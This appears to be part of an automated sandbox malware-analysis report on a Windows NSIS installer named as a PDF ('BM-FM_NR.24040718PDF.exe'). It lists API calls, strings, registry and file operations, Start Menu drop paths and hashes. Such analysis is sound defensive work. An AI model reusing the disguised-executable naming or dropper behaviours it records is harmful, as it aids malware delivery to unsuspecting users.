                                                                        • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 00402CDF
                                                                      Strings
                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                      • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                      • Inst, xrefs: 00402D4B
                                                                      • "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe", xrefs: 00402C66
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                      • Null, xrefs: 00402D5D
                                                                      • Error launching installer, xrefs: 00402CB6
                                                                      • soft, xrefs: 00402D54
                                                                      • C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                      Similarity
                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph (node and edge listing omitted): starts at 401751; API calls in graph: lstrcatA, CompareFileTime, SetFileTime, CloseHandle
                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold,00000000,00000000,00000031), ref: 00401790
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold,00000000,00000000,00000031), ref: 004017BA
                                                                        • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Dominique Setup,NSIS Error), ref: 00405D3C
                                                                        • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                        • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                        • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0), ref: 00404FA4
                                                                        • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll), ref: 00404FB6
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp$C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold$Call
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph (node and edge listing omitted): starts at 402e9f; API calls in graph: GetTickCount, MulDiv, wsprintfA
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: DA$ DA$... %d%%$;]A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph (node and edge listing omitted): starts at 404f48; API calls in graph: lstrlenA, lstrcatA, SetWindowTextA, SendMessageA
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                      • lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0), ref: 00404FA4
                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll), ref: 00404FB6
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph (node and edge listing omitted): starts at 40540e; API calls in graph: CreateDirectoryA, GetLastError, SetFileSecurityA
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                      • GetLastError.KERNEL32 ref: 00405465
                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                      • GetLastError.KERNEL32 ref: 00405484
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                      • API String ID: 3449924974-2230009264
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 904 40605a-40607a GetSystemDirectoryA 905 40607c 904->905 906 40607e-406080 904->906 905->906 907 406090-406092 906->907 908 406082-40608a 906->908 910 406093-4060c5 wsprintfA LoadLibraryExA 907->910 908->907 909 40608c-40608e 908->909 909->910
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                      • wsprintfA.USER32 ref: 004060AA
                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-4240819195
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 911 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 918 4023b0-4023b8 911->918 919 4028cf-4028de 911->919 921 4023c8-4023cb 918->921 922 4023ba-4023c7 call 402a3a lstrlenA 918->922 924 4023db-4023de 921->924 925 4023cd-4023da call 402a1d 921->925 922->921 929 4023e0-4023ea call 402e9f 924->929 930 4023ef-402403 RegSetValueExA 924->930 925->924 929->930 933 402405 930->933 934 402408-4024de RegCloseKey 930->934 933->934 934->919 936 4026a6-4026ad 934->936 936->919
                                                                      APIs
                                                                      • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspCEF8.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspCEF8.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspCEF8.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp
                                                                      • API String ID: 1356686001-1930588908
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 937 4059d1-4059db 938 4059dc-405a07 GetTickCount GetTempFileNameA 937->938 939 405a16-405a18 938->939 940 405a09-405a0b 938->940 942 405a10-405a13 939->942 940->938 941 405a0d 940->941 941->942
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004059E5
                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                      Strings
                                                                      • nsa, xrefs: 004059DC
                                                                      • "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe", xrefs: 004059D1
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-3719421255
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 943 402a7a-402aa3 RegOpenKeyExA 944 402aa5-402ab0 943->944 945 402b0e-402b12 943->945 946 402acb-402adb RegEnumKeyA 944->946 947 402ab2-402ab5 946->947 948 402add-402aef RegCloseKey call 4060c8 946->948 949 402b02-402b05 RegCloseKey 947->949 950 402ab7-402ac9 call 402a7a 947->950 956 402af1-402b00 948->956 957 402b15-402b1b 948->957 954 402b0b-402b0d 949->954 950->946 950->948 954->945 956->945 957->954 958 402b1d-402b2b RegDeleteKeyA 957->958 958->954 959 402b2d 958->959 959->945
                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                      • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                        • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                        • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                        • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                      • String ID:
                                                                      • API String ID: 1791698881-3916222277
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                        • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                        • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                        • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,00000000,0041B020,762923A0), ref: 00404FA4
                                                                        • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll), ref: 00404FB6
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                        • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2987980305-0
                                                                      • Opcode ID: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                                      • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                      • Opcode Fuzzy Hash: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
                                                                      • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                        • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold,00000000,00000000,000000F0), ref: 00401634
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold, xrefs: 00401629
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold
                                                                      • API String ID: 1892508949-3007469680
                                                                      • Opcode ID: 7188fab01f49ece1fc3d3e3b23cf81e7f7d703405b400d5c747525d0e762397e
                                                                      • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                      • Opcode Fuzzy Hash: 7188fab01f49ece1fc3d3e3b23cf81e7f7d703405b400d5c747525d0e762397e
                                                                      • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: EnumErrorLastWindows
                                                                      • String ID:
                                                                      • API String ID: 14984897-0
                                                                      • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                      • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                      • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                      • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000001C9,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                      • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspCEF8.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: 5d02d39d18c7420ae23421be02b47941236429407c77bad0b73785f5ea68c250
                                                                      • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                      • Opcode Fuzzy Hash: 5d02d39d18c7420ae23421be02b47941236429407c77bad0b73785f5ea68c250
                                                                      • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                      • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                      • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                      • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000001C9,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteOpenValue
                                                                      • String ID:
                                                                      • API String ID: 849931509-0
                                                                      • Opcode ID: d3e0ab3d232ec2ff4644ea3c35e983a9a942872944a83cfb3dafb9f4e3a41141
                                                                      • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                      • Opcode Fuzzy Hash: d3e0ab3d232ec2ff4644ea3c35e983a9a942872944a83cfb3dafb9f4e3a41141
                                                                      • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                        • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                        • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                        • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                      • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                      • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                      • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004059A6
                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                      • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                      • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                      • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                      • GetLastError.KERNEL32 ref: 0040549F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
